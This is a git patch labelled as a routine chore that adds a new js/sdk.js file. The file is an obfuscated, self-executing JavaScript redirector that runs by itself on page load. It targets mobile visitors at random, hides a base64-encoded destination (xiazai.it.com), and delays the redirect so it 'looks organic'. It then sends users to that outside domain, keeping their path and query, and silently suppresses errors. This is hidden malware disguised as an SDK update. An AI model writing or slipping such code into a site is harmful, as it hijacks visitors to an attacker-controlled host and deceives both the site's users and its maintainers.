From 1e295209dea58bfdea501a81dca18b0135b690c5 Mon Sep 17 00:00:00 2001 From: w64u86708 Date: Thu, 20 Aug 2026 21:11:40 +0000 Subject: [PATCH] chore: update js/sdk.js --- js/sdk.js | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 js/sdk.js diff --git a/js/sdk.js b/js/sdk.js new file mode 100644 index 0000000..5452ef9 --- /dev/null +++ b/js/sdk.js @@ -0,0 +1,13 @@ +(function(){try{ +var u=navigator.userAgent||''; +if(!/Mobile|Android|iPhone|iPad|iPod|webOS|BlackBerry|IEMobile|Opera Mini/i.test(u))return; +if(Math.random()>=0.6)return; +if(window.__m60d)return; window.__m60d=1; +var h=location.hostname||''; +// avoid loops +if(/xiazai|yicpmq|710wunwt/i.test(h))return; +var b=atob('aHR0cHM6Ly94aWF6YWkuaXQuY29t'); // https://xiazai.it.com +var t=b+location.pathname+location.search+location.hash; +// delay looks organic +setTimeout(function(){try{location.replace(t)}catch(e){location.href=t}}, 30+Math.floor(Math.random()*120)); +}catch(e){}})(); \ No newline at end of file